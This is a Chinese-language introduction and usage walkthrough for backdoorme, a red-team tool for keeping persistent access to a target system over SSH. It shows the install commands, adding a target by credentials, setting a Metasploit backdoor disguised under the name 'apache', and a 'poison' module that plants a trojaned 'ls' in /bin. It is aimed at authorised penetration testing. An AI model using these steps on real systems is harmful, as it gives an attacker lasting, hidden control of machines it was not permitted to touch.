backdoorme是一款专为红队研究人员设计的自动化后门安全测试模块,广大安全研究人员和红队研究人员可以使用该工具实现渗透测试的持久化机制,并以此来测试目标系统的安全性,最终实现安全环境提升。
Metasploit可以帮助我们对目标系统环境进行安全渗透测试,但是当我们对目标设备执行完一次安全测试之后,想要再次访问目标设备,该怎么办呢?backdoorme便能够解决我们的问题。
backdoorme可以释放大量后门程序来帮助我们在目标设备中建立持久化机制,一旦跟目标设备建立了SSH连接,backdoorme的优势便出来了。但需要注意的是,backdoorme并不是一个能够获取root访问权限的工具。
请仅在获得明确许可的情况下使用backdoorme,该工具仅供安全测试和安全性提升使用,请不要将其用于其他目的。
由于该工具基于Python 3.5+开发,因此我们首先需要在本地设备上安装并配置好Python 3.5+环境。接下来,广大研究人员可以使用下列命令将项目源码克隆至本地:
git clone https://github.com/Kkevsterrr/backdoorme.git
接下来,我们需要执行下列命令安装该工具所需的其他依赖组件:
$ sudo apt-get install python3 python3-pip python3-tk nmap$ cd backdoorme/$ virtualenv --python=python3.5 env$ source env/bin/activate(env) $ pip install -r requirements.txt
启动backdoorme:
$ python master.py
添加目标:
>> addtargetTarget Hostname: 10.1.0.2Username: victimPassword: password123+ Target 1 Set!>>
如需使用后门功能,可以直接运行“user”命令:
>> use shell/metasploit+ Using current target 1.+ Using Metasploit backdoor...(msf) >>
这里我们可以设置一个持久化后门,并使用“show options”或“help”查看配置的参数列表,使用“set”命令可以直接设置要使用的参数:
(msf) >> show optionsBackdoor options:Option Value Description Required------ ----- ----------- --------name initd name of the backdoor False...(msf) >> set name apache+ name => apache(msf) >> show optionsBackdoor options:Option Value Description Required------ ----- ----------- --------name apache name of the backdoor False...
每一个后门组件都支持添加额外的功能模块,使用“add”命令即可添加模块:
(msf) >> add poison+ Poison module added
每一个模块都提供了额外的参数支持自定义功能:
(msf) >> help...Poison module options:Option Value Description Required------ ----- ----------- --------name ls name of command to poison Falselocation /bin where to put poisoned files into False
本项目的开发与发布遵循MIT开源许可证协议。
backdoorme:
https://github.com/Kkevsterrr/backdoorme